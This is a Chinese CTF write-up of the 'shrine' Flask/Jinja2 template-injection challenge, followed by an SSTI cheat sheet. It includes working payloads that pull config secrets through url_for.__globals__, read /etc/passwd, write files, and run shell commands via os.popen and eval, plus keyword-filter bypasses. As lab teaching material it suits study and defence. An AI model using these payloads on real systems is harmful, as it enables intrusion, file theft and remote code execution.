打开题目

 整理一下，代码:

import flask
import osapp = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')def index():return open(__file__).read()@app.route('/shrine/')def shrine(shrine):def safe_jinja(s):s = s.replace('(', '').replace(')', '')blacklist = ['config', 'self']return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + sreturn flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':app.run(debug=True)

    我们简单的代码审计一下

定义了两个路由 / 和 /shrine/，分别对应两个视图函数 index 和 shrine

• index 视图函数：这个函数定义了一个路由 /，当用户访问该路由时，会读取文件内容

• shrine 视图函数：这个函数定义了一个路由 /shrine/，它接受一个参数 shrine，内部函数 safe_jinja 对参数进行处理，并通过 flask.render_template_string 渲染模板。然而，safe_jinja 函数中的黑名单机制替换了括号

• blacklist = ['config', 'self']：定义了名为 blacklist 的列表，其中包含了要在模板中禁止使用的变量名 'config' 和 'self'。

• ['{{% set {}=None%}}'.format(c) for c in blacklist]：这部分代码使用了列表推导式，遍历 blacklist 中的每个元素 c，并生成一个格式化后的 Jinja2 模板语句 '{{% set {}=None%}}'，其中 {} 将会被替换为 blacklist 中的变量名。

• ''.join(...)：使用 join 方法将列表中的所有模板语句连接成一个字符串。

• + s：将生成的模板语句字符串与传入的参数 s 连接起来，以生成一个经过处理的字符串返回给调用者

我们用tplmap测试有没有ssti注入

./tplmap.py -u ‘xxxxxx’

发现回显没发现注入点

我们发现有两个路由，我们测试一下

存在ssti注入

我们的目的就是获取全局文本，current_app的config里面的flag

在python里，有许多内置函数，其中有一个 url_for ，其作用是给指定的函数构造 URL。配合globals()，该函数会以字典类型返回当前位置的全部全局变量。

payload:

{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}

{{url_for.__globals__['current_app'].config}}

都能得到flag

知识点：

1.ssti的漏洞实质

  实质就是服务器端接受了用户的输入，没有经过过滤或者说过滤不严谨，将用户输入作为web应用模板的一部分，但是在进行编译渲染的过程中，执行了用户输入的恶意代码，造成信息泄露，代码执行，getshell等问题

2.flask的一些特性

flask有两种渲染方式，render_template() 和 render_template_string()。

render_template()是渲染文件的，render_template_string是渲染字符串的

使用{ { }}作为变量包裹标识符；

快速查找该引用对应的位置：

''.__class__.__mro__[2].__subclasses__().index(file)

文件读写：

''.__class__.__mro__[2].__subclasses__()[40]

//读取文件

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['file']("/etc/passwd").read()

''.__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()

将read()改为write()就可以进行写操作：

''.__class__.__mro__[2].__subclasses__()[40]("/root/桌面/test.txt", "a").write("123")

命令执行

1.利用eval进行命令执行

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')

2.利用commands实现命令执行

[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')}

{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('whoami').read()

直接将这些payload放入{ {}}中作为变量执行即可获得想要的结果

flask之url_for函数

url_for()作用:
(1)给指定的函数构造 URL。
(2)访问静态文件(CSS / JavaScript 等)。 只要在你的包中或是模块的所在目录中创建一个名为 static 的文件夹，在应用中使用 /static 即可访问。

更多见：flask之url_for()函数_flask url_for-CSDN博客

02_详解Flask中的URL ——url_for() 与 自定义动态路由过滤器-CSDN博客

flask之current_app

是Flask中的一个全局变量，代表当前运行的Flask应用实例

current_app的主要作用是在应用程序的不同部分中访问应用实例，以便获取应用配置、数据库连接和其他应用范围的对象

Flask特有的变量和函数

config

　　config 对象就是Flask的config对象，也就是 app.config 对象

request

　　Flask中代表当前请求的request对象

session

　　Flask的session对象

url_for()

　　url_for会根据传入的路由器函数名,返回该路由对应的URL,在模板中始终使用url_for()就可以安全的修改路由绑定的URL,则不比担心模板中渲染出错的链接

get_flashed_messages()

　　这个函数会返回之前在flask中通过flask()传入的消息的列表，flash函数的作用很简单,可以把由Python字符串表示的消息加入一个消息队列中，再使用get_flashed_message()函数取出它们并消费掉

flask SSTI 题的基本思路

flask SSTI 题的基本思路就是利用 python 中的 魔术方法 找到自己要用的函数。

• __dict__：保存类实例或对象实例的属性变量键值对字典
• __class__：返回调用的参数类型
• __mro__：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。
• __bases__：返回类型列表
• __subclasses__：返回object的子类
• __init__：类的初始化方法
• __globals__：函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价

__base__ 和 __mro__ 都是用来寻找基类的。

姿势集：

1.{{config}} 可以获取当前设置

如果题目是这样的：

app.config ['FLAG'] = os.environ.pop（'FLAG'）

可以直接访问 {{config['FLAG']}} 或者 {{config.FLAG}} 得到 flag。

或者

{{self.__dict__._TemplateReference__context.config}}

同样可以找到 config。

2.  [ ] 和 ( )

{{[].__class__.__base__.__subclasses__()[68].__init__.__globals__['os'].__dict__.environ['FLAG]}}

3.url_for、g、request、namespace、lipsum、range、session、dict、get_flashed_messages、cycler、joiner、config等

如果上面提到的 config、self 不能使用，要获取配置信息，就必须从它的全局变量（访问配置 current_app 等）。

例如：

{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}

4.一些关键字被过滤

• base64编码绕过

用于__getattribute__使用实例访问属性时。

例如，过滤掉 __class__ 关键词

{{[].__getattribute__('X19jbGFzc19f'.decode('base64')).__base__.__subclasses__()[40]("/etc/passwd").read()}}

• 字符串拼接绕过

{{[].__getattribute__('__c'+'lass__').__base__.__subclasses__()[40]("/etc/passwd").read()}}
{{[].__getattribute__(['__c','lass__']|join).__base__.__subclasses__()[40]}}

更多见：CTF|有关SSTI的一切小秘密【Flask SSTI+姿势集+Tplmap大杀器】 - 知乎

参考wp：

攻防世界 shrine——模板注入绕过：过滤（），{% set %} 过滤config、self - FreeBuf网络安全行业门户

[WesternCTF2018]shrine 1-CSDN博客

知识点参考文章：

Python Flask 基础入门第六课： Flask 全局变量 current_app, g 以及 session各自如何使用 有什么差异-CSDN博客

flask之url_for()函数_flask url_for-CSDN博客

关于flask的SSTI注入[通俗易懂]-腾讯云开发者社区-腾讯云

flask模板注入(ssti),一篇就够了_flask"+"ssti"+"总结-CSDN博客